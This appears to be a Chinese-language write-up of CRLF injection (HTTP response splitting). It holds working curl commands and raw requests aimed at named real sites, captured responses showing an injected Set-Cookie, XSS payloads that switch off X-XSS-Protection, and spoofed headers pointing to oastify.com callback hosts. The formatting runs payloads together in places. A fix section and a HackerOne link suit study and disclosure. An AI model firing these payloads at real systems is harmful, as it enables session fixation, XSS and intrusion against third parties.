CRLF攻击响应截断
漏洞说明
CRLF是CR和LF两个字符的拼接,它们分别代表”回车+换行”(\r\n)“,全称为Carriage Return/Line Feed”,十六进制编码分别为0x0d和0x0a,URL编码为%0D和%0A。CR和LF组合在一起即CRLF命令,它表示键盘上的”Enter”键,许多应用程序和网络协议使用这些命令作为分隔符。
而在HTTP协议中,HTTP header之间是由一个CRLF字符序列分隔开的,HTTP Header与Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。
所以如果用户的输入在HTTP返回包的Header处回显,便可以通过CRLF来提前结束响应头,在响应内容处注入攻击脚本。因此CRLF Injection又叫HTTP响应拆分/截断(HTTP Response Splitting)简称HRS。
攻击
参数后面加上%0D%0A然后拼接内容如果有响应就是存在该漏洞
curl -i https://www.baidu.com/#/%0D%0ASet-Cookie:%20CRLF_Injection_By_ze2pac如下:存在set-cookie的响应就是存在该漏洞
┌──(azab?kali)-[~]
└─$ curl -i http://www.banfieldassets.com/%0D%0ASet-Cookie:%20CRLF_Injection_By_ze2pac
HTTP/1.1 307 Temporary Redirect
Date: Tue, 11 Apr 2023 20:51:09 GMT
Content-Type: text/html
Content-Length: 164
Connection: keep-alive
Server: nginx
Location: https://banfieldassets.widencollective.com/
Set-Cookie: CRLF_Injection_By_ze2pac
<html>
<head><title>307 Temporary Redirect</title></head>
<body>
<center><h1>307 Temporary Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>https://ip/xxx/xxx?c=xxx&d=%c4%8d%c4%8aHello666: Me_Too%c4%8d%c4%8aSet-Cookie:xxx
%c4%8d%c4%8a 为url编码如setcookie为会话固定
xss:
但是,如何用CRLF打XSS的方法还是需要了解,正常来说,先关掉XSS-protection,0就是关,1就是开。因为CRLF是可以修改响应包的,所以只要添加一个X-XSS-Protection就行。
如果遇到XSS过滤的情况我们还可以在httpheader中注入X-XSS-Protection:0,可绕过浏览器的过滤规则实现XSS弹窗显示。
%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>htmli html注入:
GET /%0d%0a%0d%0a%3Ch1%3Eze2pac%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3E HTTP/1.1
Host: www.banfieldassets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@4kpczathycs7dma3e4neflp6dxjqmeb.oastify.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Cache-Control: no-transform
CF-Connecting_IP: spoofed.659ekcejjed9yov5z68g0na8yz4s4gt.oastify.com
X-Client-IP: spoofed.d9nlojiqnlhg2vzc3dcn4uef268zcn1.oastify.com
From: root@5rxd6b0i5dz8knh4l5ufmmw7kyqsgg5.oastify.com
Referer: http://gk4ozmttyosjdyafegnqfxpid9j3arz.oastify.com/ref
Client-IP: spoofed.0648l6fdk8e3ziwz009a1hb2zt5nxbm.oastify.com
True-Client-IP: spoofed.mc2urslzqukp542l6mfw73ho5fb94xt.oastify.com
Contact: root@mkauzstzyuspd4alemnwf3podfj9dx2.oastify.com
X-Real-IP: spoofed.yy06d47bc661rgoxsy18tf30rrxls9h.oastify.com
X-Wap-Profile: http://c7kkmigplkff0uxb1cam2tce056z2nr.oastify.com/wap.xml
X-Forwarded-For: spoofed.m5suksezjudpy4vlzm8w03aoyf491xq.oastify.com
X-Originating-IP: spoofed.j4orjpdwircmx1uiyj7tz09lxc361uq.oastify.com
Forwarded: for=spoofed.vba3q1k8p3jy4d1u5ve56cgx4oai96y.oastify.com;by=spoofed.vba3q1k8p3jy4d1u5ve56cgx4oai96y.oastify.com;host=spoofed.vba3q1k8p3jy4d1u5ve56cgx4oai96y.oastify.com%0d%0a%0d%0a%3Ch1%3Eze2pac%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3E
解码为
<h1>ze2pac</h1>
<p>CRLF Injection PoC</h1>Impact
XSS, Open Redirect, HTTP Response Splitting… etc.
fix:
对用户的数据进行合法性校验,对特殊的字符进行编码,如<、>、’、”、CR、LF等,限制用户输入的CR和LF,或者对CR和LF字符正确编码后再输出,以防止注入自定义HTTP头。 创建安全字符白名单,只接受白名单中的字符出现在HTTP响应头文件中。在将数据传送到http响应头之前,删除所有的换行符。
LINKS
https://hackerone.com/reports/1943013
https://blog.csdn.net/weixin_43847838/article/details/122189617